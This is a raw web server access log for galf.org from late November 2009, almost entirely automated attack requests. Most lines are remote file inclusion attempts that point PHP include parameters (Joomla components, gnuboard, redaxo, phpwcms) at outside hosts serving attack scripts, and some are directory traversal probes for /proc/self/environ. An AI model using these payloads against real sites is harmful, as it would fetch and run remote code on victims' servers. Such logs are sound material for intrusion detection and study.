222.122.72.246 - - [29/Nov/2009:23:45:31 -0800] "GET /logs/access_090914.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:45:51 -0800] "GET /logs/access_090720.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:45:53 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:49:11 -0800] "GET /logs/access_090907.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:49:13 -0800] "GET /logs/access_090831.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.51 - - [29/Nov/2009:23:52:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
91.192.20.164 - - [29/Nov/2009:23:59:14 -0800] "GET /include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [29/Nov/2009:23:59:14 -0800] "GET /logs/access_090511.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [29/Nov/2009:23:59:14 -0800] "GET /logs//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [30/Nov/2009:00:01:51 -0800] "GET /logs/access_091005.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:01:59 -0800] "GET /include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:01:59 -0800] "GET /logs/access_090511.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:01:59 -0800] "GET /logs//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [30/Nov/2009:00:03:23 -0800] "GET /logs/access_091116.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:04:31 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:04:31 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:04:31 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:04 -0800] "GET /logs//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:04 -0800] "GET /logs/access_090511.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:04 -0800] "GET /include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:06:26 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.0" 200 1033 "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:06:26 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:06:26 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:41 -0800] "GET /logs//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:41 -0800] "GET /include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:41 -0800] "GET /logs/access_090511.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:06:58 -0800] "GET /logs/access_090608.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [30/Nov/2009:00:07:03 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
213.186.34.130 - - [30/Nov/2009:00:07:04 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
213.186.34.130 - - [30/Nov/2009:00:07:04 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:34 -0800] "GET /logs/access_090608.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:38 -0800] "GET /include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:38 -0800] "GET /logs//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:39 -0800] "GET /logs/access_090511.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:48 -0800] "GET /logs/access_090511.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:48 -0800] "GET /include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:07:48 -0800] "GET /logs//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:08:51 -0800] "GET /logs/access_090608.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:00:09:07 -0800] "GET /logs/access_090608.log//include/footer.php?_path[counter]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.82.156.202 - - [30/Nov/2009:00:10:25 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 524288 "http://getaforum.com/i.social.php?Q=/inc/header.php/step_" "Mozilla/5.0 (compatible; Steeler/3.5; http://www.tkl.iis.u-tokyo.ac.jp/~crawler/)" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:11:03 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:11:03 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:11:03 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:11:04 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:11:04 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:11:04 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:12:40 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:00:12:42 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:14:24 -0800] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:14:24 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:14:24 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:14:43 -0800] "GET /logs/access_090706.log////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:00:16:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:00:16:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:00:16:00 -0800] "GET /logs/access_090504.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:00:16:04 -0800] "GET /logs/access_090427.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.82.156.202 - - [30/Nov/2009:00:18:08 -0800] "GET / HTTP/1.1" 200 1048 "http://igr6hk6f97.xorg.pl/search,lesbianas.html" "Mozilla/5.0 (compatible; Steeler/3.5; http://www.tkl.iis.u-tokyo.ac.jp/~crawler/)" "www.galf.org"
213.186.34.130 - - [30/Nov/2009:00:25:22 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [30/Nov/2009:00:25:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [30/Nov/2009:00:25:23 -0800] "GET /logs/access_090713.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:29 -0800] "GET /logs/access.log//index.php?t=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:29 -0800] "GET /index.php?t=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:30 -0800] "GET /logs/access.log//index.php?t=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:30 -0800] "GET /index.php?t=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:30 -0800] "GET /logs/access.log//index.php?t=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:30 -0800] "GET /index.php?t=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:30 -0800] "GET /logs/access.log/errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
93.90.186.58 - - [30/Nov/2009:00:25:30 -0800] "GET /errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "galf.org"
91.121.181.60 - - [30/Nov/2009:00:30:19 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:30:19 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:30:19 -0800] "GET /logs/access_090622.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:30:23 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:30:23 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:30:23 -0800] "GET /logs/access_090622.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:31:01 -0800] "GET /logs//skin/sirini_ezset/view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:31:01 -0800] "GET /logs/access_091116.log%20%20//skin/sirini_ezset/view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:31:01 -0800] "GET /logs//skin/sirini_ezset/view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:31:01 -0800] "GET /logs/access_091116.log//skin/sirini_ezset/view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:31:01 -0800] "GET /skin/sirini_ezset/view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:31:01 -0800] "GET /skin/sirini_ezset/view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:00:31:17 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:00:31:17 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:00:31:17 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:00:32:15 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:00:32:15 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:00:32:15 -0800] "GET /logs/access_090511.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:00:32:19 -0800] "GET /logs/access_090831.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:00:32:46 -0800] "GET /logs/access_090914.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:34:34 -0800] "GET /logs/access_090622.log//components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:00:34:47 -0800] "GET /logs/access_090622.log//components/com_simpleboard/image_upload.php?sbp=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:38:48 -0800] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:38:48 -0800] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:38:48 -0800] "GET /logs/access.log%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:00:39:43 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:00:39:43 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:00:39:43 -0800] "GET /logs/access_090525.log%20%20//agendax/addevent.inc.php?agendax_path=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:41:25 -0800] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.214.172.86 - - [30/Nov/2009:00:41:48 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:41:48 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:41:48 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:41:52 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:41:52 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:41:52 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:41:55 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:41:55 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:41:55 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:00:42:00 -0800] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.217.5.165 - - [30/Nov/2009:00:42:00 -0800] "GET /logs/access.log/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.214.172.86 - - [30/Nov/2009:00:42:23 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:42:26 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:42:46 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:43:38 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:43:38 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:43:38 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:43:38 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
